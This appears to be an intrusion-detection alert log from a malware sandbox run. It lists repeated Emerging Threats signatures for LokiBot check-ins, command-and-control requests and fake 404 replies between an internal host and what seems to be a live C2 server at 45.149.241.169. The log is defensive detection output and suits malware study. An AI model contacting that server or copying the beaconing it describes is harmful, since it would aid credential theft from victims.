                                                          2024-10-03T09:21:26.743539+02002025483ET MALWARE LokiBot Fake 404 Response145.149.241.16980192.168.2.1049743TCP
                                                          2024-10-03T09:21:26.897709+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.104974445.149.241.16980TCP
                                                          2024-10-03T09:21:26.897709+02002025381ET MALWARE LokiBot Checkin1192.168.2.104974445.149.241.16980TCP
                                                          2024-10-03T09:21:26.897709+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.104974445.149.241.16980TCP
                                                          2024-10-03T09:21:27.713273+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.104974445.149.241.16980TCP
                                                          2024-10-03T09:21:27.713273+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.104974445.149.241.16980TCP
                                                          2024-10-03T09:21:27.718153+02002025483ET MALWARE LokiBot Fake 404 Response145.149.241.16980192.168.2.1049744TCP
                                                          2024-10-03T09:21:27.873598+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.104974545.149.241.16980TCP
                                                          2024-10-03T09:21:27.873598+02002025381ET MALWARE LokiBot Checkin1192.168.2.104974545.149.241.16980TCP
                                                          2024-10-03T09:21:27.873598+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.104974545.149.241.16980TCP
                                                          2024-10-03T09:21:28.560491+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.104974545.149.241.16980TCP
                                                          2024-10-03T09:21:28.560491+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.104974545.149.241.16980TCP
                                                          2024-10-03T09:21:28.565618+02002025483ET MALWARE LokiBot Fake 404 Response145.149.241.16980192.168.2.1049745TCP
                                                          2024-10-03T09:21:28.712017+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.104974645.149.241.16980TCP
                                                          2024-10-03T09:21:28.712017+02002025381ET MALWARE LokiBot Checkin1192.168.2.104974645.149.241.16980TCP
                                                          2024-10-03T09:21:28.712017+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.104974645.149.241.16980TCP
                                                          2024-10-03T09:21:29.491681+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.104974645.149.241.16980TCP
                                                          2024-10-03T09:21:29.491681+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.104974645.149.241.16980TCP
                                                          2024-10-03T09:21:29.496599+02002025483ET MALWARE LokiBot Fake 404 Response145.149.241.16980192.168.2.1049746TCP
                                                          2024-10-03T09:21:29.654591+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.104974745.149.241.16980TCP
                                                          2024-10-03T09:21:29.654591+02002025381ET MALWARE LokiBot Checkin1192.168.2.104974745.149.241.16980TCP
                                                          2024-10-03T09:21:29.654591+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.104974745.149.241.16980TCP
                                                          2024-10-03T09:21:30.421696+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.104974745.149.241.16980TCP
                                                          2024-10-03T09:21:30.421696+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.104974745.149.241.16980TCP
                                                          2024-10-03T09:21:30.428216+02002025483ET MALWARE LokiBot Fake 404 Response145.149.241.16980192.168.2.1049747TCP
                                                          2024-10-03T09:21:30.592777+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.104974945.149.241.16980TCP
                                                          2024-10-03T09:21:30.592777+02002025381ET MALWARE LokiBot Checkin1192.168.2.104974945.149.241.16980TCP
                                                          2024-10-03T09:21:30.592777+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.104974945.149.241.16980TCP
                                                          2024-10-03T09:21:31.421949+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.104974945.149.241.16980TCP
                                                          2024-10-03T09:21:31.421949+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.104974945.149.241.16980TCP
                                                          2024-10-03T09:21:31.426744+02002025483ET MALWARE LokiBot Fake 404 Response145.149.241.16980192.168.2.1049749TCP
                                                          2024-10-03T09:21:32.603612+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.104975045.149.241.16980TCP
                                                          2024-10-03T09:21:32.603612+02002025381ET MALWARE LokiBot Checkin1192.168.2.104975045.149.241.16980TCP
                                                          2024-10-03T09:21:32.603612+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.104975045.149.241.16980TCP
                                                          2024-10-03T09:21:33.372102+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.104975045.149.241.16980TCP
                                                          2024-10-03T09:21:33.372102+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.104975045.149.241.16980TCP
                                                          2024-10-03T09:21:33.376905+02002025483ET MALWARE LokiBot Fake 404 Response145.149.241.16980192.168.2.1049750TCP
                                                          2024-10-03T09:21:33.526238+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.104975145.149.241.16980TCP
                                                          2024-10-03T09:21:33.526238+02002025381ET MALWARE LokiBot Checkin1192.168.2.104975145.149.241.16980TCP
                                                          2024-10-03T09:21:33.526238+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.104975145.149.241.16980TCP
                                                          2024-10-03T09:21:35.071052+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.104975145.149.241.16980TCP
                                                          2024-10-03T09:21:35.071052+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.104975145.149.241.16980TCP
                                                          2024-10-03T09:21:35.071224+02002025483ET MALWARE LokiBot Fake 404 Response145.149.241.16980192.168.2.1049751TCP
                                                          2024-10-03T09:21:35.225314+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.104975245.149.241.16980TCP
                                                          2024-10-03T09:21:35.225314+02002025381ET MALWARE LokiBot Checkin1192.168.2.104975245.149.241.16980TCP
                                                          2024-10-03T09:21:35.225314+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.104975245.149.241.16980TCP
                                                          2024-10-03T09:21:36.957061+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.104975245.149.241.16980TCP
                                                          2024-10-03T09:21:36.957061+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.104975245.149.241.16980TCP
                                                          2024-10-03T09:21:37.121380+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.104975345.149.241.16980TCP
                                                          2024-10-03T09:21:37.121380+02002025381ET MALWARE LokiBot Checkin1192.168.2.104975345.149.241.16980TCP
                                                          2024-10-03T09:21:37.121380+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.104975345.149.241.16980TCP
                                                          2024-10-03T09:21:42.165335+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.104975345.149.241.16980TCP
                                                          2024-10-03T09:21:42.165335+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.104975345.149.241.16980TCP
                                                          2024-10-03T09:21:42.317761+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.104975445.149.241.16980TCP
                                                          2024-10-03T09:21:42.317761+02002025381ET MALWARE LokiBot Checkin1192.168.2.104975445.149.241.16980TCP
                                                          2024-10-03T09:21:42.317761+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.104975445.149.241.16980TCP
                                                          2024-10-03T09:21:43.028732+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.104975445.149.241.16980TCP
                                                          2024-10-03T09:21:43.028732+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.104975445.149.241.16980TCP
                                                          2024-10-03T09:21:43.033644+02002025483ET MALWARE LokiBot Fake 404 Response145.149.241.16980192.168.2.1049754TCP
                                                          2024-10-03T09:21:43.182438+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.104975545.149.241.16980TCP
                                                          2024-10-03T09:21:43.182438+02002025381ET MALWARE LokiBot Checkin1192.168.2.104975545.149.241.16980TCP
                                                          2024-10-03T09:21:43.182438+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.104975545.149.241.16980TCP
                                                          2024-10-03T09:21:43.857914+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.104975545.149.241.16980TCP
                                                          2024-10-03T09:21:43.857914+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.104975545.149.241.16980TCP
                                                          2024-10-03T09:21:43.862811+02002025483ET MALWARE LokiBot Fake 404 Response145.149.241.16980192.168.2.1049755TCP
                                                          2024-10-03T09:21:44.019040+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.104975645.149.241.16980TCP
                                                          2024-10-03T09:21:44.019040+02002025381ET MALWARE LokiBot Checkin1192.168.2.104975645.149.241.16980TCP
                                                          2024-10-03T09:21:44.019040+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.104975645.149.241.16980TCP
                                                          2024-10-03T09:21:44.832028+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.104975645.149.241.16980TCP
                                                          2024-10-03T09:21:44.832028+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.104975645.149.241.16980TCP
                                                          2024-10-03T09:21:44.836889+02002025483ET MALWARE LokiBot Fake 404 Response145.149.241.16980192.168.2.1049756TCP
                                                          2024-10-03T09:21:44.999700+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.104975745.149.241.16980TCP
                                                          2024-10-03T09:21:44.999700+02002025381ET MALWARE LokiBot Checkin1192.168.2.104975745.149.241.16980TCP
                                                          2024-10-03T09:21:44.999700+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.104975745.149.241.16980TCP
                                                          2024-10-03T09:21:45.677355+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.104975745.149.241.16980TCP
                                                          2024-10-03T09:21:45.677355+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.104975745.149.241.16980TCP
                                                          2024-10-03T09:21:45.682178+02002025483ET MALWARE LokiBot Fake 404 Response145.149.241.16980192.168.2.1049757TCP
                                                          2024-10-03T09:21:45.841003+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.104975845.149.241.16980TCP
                                                          2024-10-03T09:21:45.841003+02002025381ET MALWARE LokiBot Checkin1192.168.2.104975845.149.241.16980TCP
                                                          2024-10-03T09:21:45.841003+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.104975845.149.241.16980TCP
                                                          2024-10-03T09:21:46.484782+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.104975845.149.241.16980TCP
                                                          2024-10-03T09:21:46.484782+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.104975845.149.241.16980TCP
                                                          2024-10-03T09:21:46.489748+02002025483ET MALWARE LokiBot Fake 404 Response145.149.241.16980192.168.2.1049758TCP
                                                          2024-10-03T09:21:46.640569+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.104975945.149.241.16980TCP
                                                          2024-10-03T09:21:46.640569+02002025381ET MALWARE LokiBot Checkin1192.168.2.104975945.149.241.16980TCP
                                                          2024-10-03T09:21:46.640569+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.104975945.149.241.16980TCP
                                                          2024-10-03T09:21:47.380324+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.104975945.149.241.16980TCP
                                                          2024-10-03T09:21:47.380324+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.104975945.149.241.16980TCP
                                                          2024-10-03T09:21:47.385173+02002025483ET MALWARE LokiBot Fake 404 Response145.149.241.16980192.168.2.1049759TCP
                                                          2024-10-03T09:21:47.539146+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.104976045.149.241.16980TCP
                                                          2024-10-03T09:21:47.539146+02002025381ET MALWARE LokiBot Checkin1192.168.2.104976045.149.241.16980TCP
                                                          2024-10-03T09:21:47.539146+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.104976045.149.241.16980TCP
                                                          2024-10-03T09:21:48.314653+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.104976045.149.241.16980TCP
                                                          2024-10-03T09:21:48.314653+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.104976045.149.241.16980TCP
                                                          2024-10-03T09:21:48.319408+02002025483ET MALWARE LokiBot Fake 404 Response145.149.241.16980192.168.2.1049760TCP
                                                          2024-10-03T09:21:48.485570+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.104976145.149.241.16980TCP
                                                          2024-10-03T09:21:48.485570+02002025381ET MALWARE LokiBot Checkin1192.168.2.104976145.149.241.16980TCP
                                                          2024-10-03T09:21:48.485570+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.104976145.149.241.16980TCP
                                                          2024-10-03T09:21:49.257250+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.104976145.149.241.16980TCP
                                                          2024-10-03T09:21:49.257250+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.104976145.149.241.16980TCP
                                                          2024-10-03T09:21:49.262105+02002025483ET MALWARE LokiBot Fake 404 Response145.149.241.16980192.168.2.1049761TCP
                                                          2024-10-03T09:21:50.351787+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.104976245.149.241.16980TCP
                                                          2024-10-03T09:21:50.351787+02002025381ET MALWARE LokiBot Checkin1192.168.2.104976245.149.241.16980TCP
                                                          2024-10-03T09:21:50.351787+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.104976245.149.241.16980TCP
                                                          2024-10-03T09:21:51.015102+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.104976245.149.241.16980TCP
                                                          2024-10-03T09:21:51.015102+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.104976245.149.241.16980TCP
                                                          2024-10-03T09:21:51.019960+02002025483ET MALWARE LokiBot Fake 404 Response145.149.241.16980192.168.2.1049762TCP
                                                          2024-10-03T09:21:51.167462+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.104976345.149.241.16980TCP
                                                          2024-10-03T09:21:51.167462+02002025381ET MALWARE LokiBot Checkin1192.168.2.104976345.149.241.16980TCP
                                                          2024-10-03T09:21:51.167462+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.104976345.149.241.16980TCP
                                                          2024-10-03T09:21:51.932714+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.104976345.149.241.16980TCP
                                                          2024-10-03T09:21:51.932714+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.104976345.149.241.16980TCP
                                                          2024-10-03T09:21:51.937810+02002025483ET MALWARE LokiBot Fake 404 Response145.149.241.16980192.168.2.1049763TCP
                                                          2024-10-03T09:21:52.087418+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.104976445.149.241.16980TCP
                                                          2024-10-03T09:21:52.087418+02002025381ET MALWARE LokiBot Checkin1192.168.2.104976445.149.241.16980TCP
                                                          2024-10-03T09:21:52.087418+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.104976445.149.241.16980TCP
                                                          2024-10-03T09:21:52.836195+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.104976445.149.241.16980TCP
                                                          2024-10-03T09:21:52.836195+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.104976445.149.241.16980TCP
                                                          2024-10-03T09:21:52.840992+02002025483ET MALWARE LokiBot Fake 404 Response145.149.241.16980192.168.2.1049764TCP
                                                          2024-10-03T09:21:52.996562+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.104976545.149.241.16980TCP
                                                          2024-10-03T09:21:52.996562+02002025381ET MALWARE LokiBot Checkin1192.168.2.104976545.149.241.16980TCP
                                                          2024-10-03T09:21:52.996562+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.104976545.149.241.16980TCP
                                                          2024-10-03T09:21:53.876769+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.104976545.149.241.16980TCP
                                                          2024-10-03T09:21:53.876769+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.104976545.149.241.16980TCP
                                                          2024-10-03T09:21:53.882422+02002025483ET MALWARE LokiBot Fake 404 Response145.149.241.16980192.168.2.1049765TCP
                                                          2024-10-03T09:21:54.039701+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.104976645.149.241.16980TCP
                                                          2024-10-03T09:21:54.039701+02002025381ET MALWARE LokiBot Checkin1192.168.2.104976645.149.241.16980TCP
                                                          2024-10-03T09:21:54.039701+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.104976645.149.241.16980TCP
                                                          2024-10-03T09:21:54.813087+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.104976645.149.241.16980TCP
                                                          2024-10-03T09:21:54.813087+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.104976645.149.241.16980TCP
                                                          2024-10-03T09:21:54.819508+02002025483ET MALWARE LokiBot Fake 404 Response145.149.241.16980192.168.2.1049766TCP
                                                          2024-10-03T09:21:54.984252+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.104976745.149.241.16980TCP
                                                          2024-10-03T09:21:54.984252+02002025381ET MALWARE LokiBot Checkin1192.168.2.104976745.149.241.16980TCP
                                                          2024-10-03T09:21:54.984252+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.104976745.149.241.16980TCP
                                                          2024-10-03T09:21:55.759857+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.104976745.149.241.16980TCP
                                                          2024-10-03T09:21:55.759857+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.104976745.149.241.16980TCP
                                                          2024-10-03T09:21:55.764891+02002025483ET MALWARE LokiBot Fake 404 Response145.149.241.16980192.168.2.1049767TCP
                                                          2024-10-03T09:21:55.928869+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.104976845.149.241.16980TCP
                                                          2024-10-03T09:21:55.928869+02002025381ET MALWARE LokiBot Checkin1192.168.2.104976845.149.241.16980TCP
                                                          2024-10-03T09:21:55.928869+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.104976845.149.241.16980TCP
                                                          2024-10-03T09:21:57.049364+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.104976845.149.241.16980TCP
                                                          2024-10-03T09:21:57.049364+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.104976845.149.241.16980TCP
                                                          2024-10-03T09:21:57.079321+02002025483ET MALWARE LokiBot Fake 404 Response145.149.241.16980192.168.2.1049768TCP
                                                          2024-10-03T09:21:57.209847+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.104976945.149.241.16980TCP
                                                          2024-10-03T09:21:57.209847+02002025381ET MALWARE LokiBot Checkin1192.168.2.104976945.149.241.16980TCP
                                                          2024-10-03T09:21:57.209847+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.104976945.149.241.16980TCP
                                                          2024-10-03T09:21:58.038305+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.104976945.149.241.16980TCP
                                                          2024-10-03T09:21:58.038305+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.104976945.149.241.16980TCP
                                                          2024-10-03T09:21:58.045547+02002025483ET MALWARE LokiBot Fake 404 Response145.149.241.16980192.168.2.1049769TCP
                                                          2024-10-03T09:21:58.212197+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.104977045.149.241.16980TCP
                                                          2024-10-03T09:21:58.212197+02002025381ET MALWARE LokiBot Checkin1192.168.2.104977045.149.241.16980TCP
                                                          2024-10-03T09:21:58.212197+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.104977045.149.241.16980TCP
                                                          2024-10-03T09:21:59.153854+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.104977045.149.241.16980TCP
                                                          2024-10-03T09:21:59.153854+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.104977045.149.241.16980TCP
                                                          2024-10-03T09:21:59.158748+02002025483ET MALWARE LokiBot Fake 404 Response145.149.241.16980192.168.2.1049770TCP
                                                          2024-10-03T09:21:59.314369+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.104977145.149.241.16980TCP
                                                          2024-10-03T09:21:59.314369+02002025381ET MALWARE LokiBot Checkin1192.168.2.104977145.149.241.16980TCP
                                                          2024-10-03T09:21:59.314369+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.104977145.149.241.16980TCP
                                                          2024-10-03T09:22:00.071903+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.104977145.149.241.16980TCP
                                                          2024-10-03T09:22:00.071903+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.104977145.149.241.16980TCP
                                                          2024-10-03T09:22:00.077875+02002025483ET MALWARE LokiBot Fake 404 Response145.149.241.16980192.168.2.1049771TCP
                                                          2024-10-03T09:22:00.225165+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.104977245.149.241.16980TCP
                                                          2024-10-03T09:22:00.225165+02002025381ET MALWARE LokiBot Checkin1192.168.2.104977245.149.241.16980TCP
                                                          2024-10-03T09:22:00.225165+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.104977245.149.241.16980TCP
                                                          2024-10-03T09:22:01.204157+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.104977245.149.241.16980TCP
                                                          2024-10-03T09:22:01.204157+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.104977245.149.241.16980TCP
                                                          2024-10-03T09:22:01.217841+02002025483ET MALWARE LokiBot Fake 404 Response145.149.241.16980192.168.2.1049772TCP
                                                          2024-10-03T09:22:01.533864+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.104977345.149.241.16980TCP
                                                          2024-10-03T09:22:01.533864+02002025381ET MALWARE LokiBot Checkin1192.168.2.104977345.149.241.16980TCP
                                                          2024-10-03T09:22:01.533864+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.104977345.149.241.16980TCP
                                                          2024-10-03T09:22:02.272358+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.104977345.149.241.16980TCP
                                                          2024-10-03T09:22:02.272358+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.104977345.149.241.16980TCP
                                                          2024-10-03T09:22:02.282362+02002025483ET MALWARE LokiBot Fake 404 Response145.149.241.16980192.168.2.1049773TCP
                                                          2024-10-03T09:22:02.438719+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.104977445.149.241.16980TCP
                                                          2024-10-03T09:22:02.438719+02002025381ET MALWARE LokiBot Checkin1192.168.2.104977445.149.241.16980TCP
                                                          2024-10-03T09:22:02.438719+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.104977445.149.241.16980TCP
                                                          2024-10-03T09:22:03.139465+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.104977445.149.241.16980TCP
                                                          2024-10-03T09:22:03.139465+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.104977445.149.241.16980TCP
                                                          2024-10-03T09:22:03.145936+02002025483ET MALWARE LokiBot Fake 404 Response145.149.241.16980192.168.2.1049774TCP
                                                          2024-10-03T09:22:03.295902+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.104977545.149.241.16980TCP
                                                          2024-10-03T09:22:03.295902+02002025381ET MALWARE LokiBot Checkin1192.168.2.104977545.149.241.16980TCP
                                                          2024-10-03T09:22:03.295902+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.104977545.149.241.16980TCP
                                                          2024-10-03T09:22:08.044529+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.104977545.149.241.16980TCP
                                                          2024-10-03T09:22:08.044529+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.104977545.149.241.16980TCP
                                                          2024-10-03T09:22:08.197130+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.104977645.149.241.16980TCP
                                                          2024-10-03T09:22:08.197130+02002025381ET MALWARE LokiBot Checkin1192.168.2.104977645.149.241.16980TCP
                                                          2024-10-03T09:22:08.197130+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.104977645.149.241.16980TCP
                                                          2024-10-03T09:22:09.292301+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.104977645.149.241.16980TCP
                                                          2024-10-03T09:22:09.292301+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.104977645.149.241.16980TCP
                                                          2024-10-03T09:22:09.449762+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.104977745.149.241.16980TCP
                                                          2024-10-03T09:22:09.449762+02002025381ET MALWARE LokiBot Checkin1192.168.2.104977745.149.241.16980TCP
                                                          2024-10-03T09:22:09.449762+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.104977745.149.241.16980TCP
                                                          2024-10-03T09:22:10.319663+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.104977745.149.241.16980TCP
                                                          2024-10-03T09:22:10.319663+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.104977745.149.241.16980TCP
                                                          2024-10-03T09:22:10.325677+02002025483ET MALWARE LokiBot Fake 404 Response145.149.241.16980192.168.2.1049777TCP
                                                          2024-10-03T09:22:10.502964+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.104977845.149.241.16980TCP
                                                          2024-10-03T09:22:10.502964+02002025381ET MALWARE LokiBot Checkin1192.168.2.104977845.149.241.16980TCP
                                                          2024-10-03T09:22:10.502964+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.104977845.149.241.16980TCP
                                                          2024-10-03T09:22:11.228003+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.104977845.149.241.16980TCP
                                                          2024-10-03T09:22:11.228003+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.104977845.149.241.16980TCP
                                                          2024-10-03T09:22:11.233316+02002025483ET MALWARE LokiBot Fake 404 Response145.149.241.16980192.168.2.1049778TCP
                                                          2024-10-03T09:22:11.390993+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.104977945.149.241.16980TCP
                                                          2024-10-03T09:22:11.390993+02002025381ET MALWARE LokiBot Checkin1192.168.2.104977945.149.241.16980TCP
                                                          2024-10-03T09:22:11.390993+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.104977945.149.241.16980TCP
                                                          2024-10-03T09:22:12.130536+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.104977945.149.241.16980TCP
                                                          2024-10-03T09:22:12.130536+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.104977945.149.241.16980TCP
                                                          2024-10-03T09:22:12.139820+02002025483ET MALWARE LokiBot Fake 404 Response145.149.241.16980192.168.2.1049779TCP
                                                          2024-10-03T09:22:12.289773+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.104978045.149.241.16980TCP
                                                          2024-10-03T09:22:12.289773+02002025381ET MALWARE LokiBot Checkin1192.168.2.104978045.149.241.16980TCP
                                                          2024-10-03T09:22:12.289773+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.104978045.149.241.16980TCP
                                                          2024-10-03T09:22:13.083005+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.104978045.149.241.16980TCP
                                                          2024-10-03T09:22:13.083005+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.104978045.149.241.16980TCP
                                                          2024-10-03T09:22:13.088045+02002025483ET MALWARE LokiBot Fake 404 Response145.149.241.16980192.168.2.1049780TCP
                                                          2024-10-03T09:22:13.260240+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.104978145.149.241.16980TCP
                                                          2024-10-03T09:22:13.260240+02002025381ET MALWARE LokiBot Checkin1192.168.2.104978145.149.241.16980TCP
                                                          2024-10-03T09:22:13.260240+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.104978145.149.241.16980TCP
                                                          2024-10-03T09:22:14.029913+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.104978145.149.241.16980TCP
                                                          2024-10-03T09:22:14.029913+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.104978145.149.241.16980TCP
                                                          2024-10-03T09:22:14.035809+02002025483ET MALWARE LokiBot Fake 404 Response145.149.241.16980192.168.2.1049781TCP
                                                          2024-10-03T09:22:14.183320+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.104978245.149.241.16980TCP
                                                          2024-10-03T09:22:14.183320+02002025381ET MALWARE LokiBot Checkin1192.168.2.104978245.149.241.16980TCP
                                                          2024-10-03T09:22:14.183320+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.104978245.149.241.16980TCP
                                                          2024-10-03T09:22:15.259916+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.104978245.149.241.16980TCP
